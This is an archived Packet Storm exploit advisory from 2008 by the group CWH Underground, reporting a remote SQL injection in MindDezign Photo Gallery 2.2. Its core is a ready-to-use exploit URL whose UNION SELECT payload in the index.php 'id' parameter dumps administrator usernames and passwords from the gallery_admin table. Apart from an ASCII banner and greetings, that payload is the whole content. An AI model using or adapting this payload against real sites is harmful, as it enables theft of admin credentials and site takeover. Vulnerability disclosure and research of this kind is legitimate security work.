minddezignpg-sql.txt

2008-10-23T00:00:00
ID PACKETSTORM:71173
Type packetstorm
Reporter CWH Underground
Modified 2008-10-23T00:00:00

Description

                                        
                                            `==================================================================================  
MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability  
==================================================================================  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
AUTHOR : CWH Underground  
DATE : 23 October 2008  
SITE : cwh.citec.us  
  
  
#####################################################  
APPLICATION : MindDezign Photo Gallery  
VERSION : 2.2  
DOWNLOAD : http://gallery.minddezign.com/?module=download  
#####################################################  
  
--- Remote SQL Injection ---  
  
** Magic Quote must turn off **  
  
  
[+] Vulnerable in index.php (id)  
  
---------  
Exploit  
---------  
  
[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--  
  
  
#######################################################################################  
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
`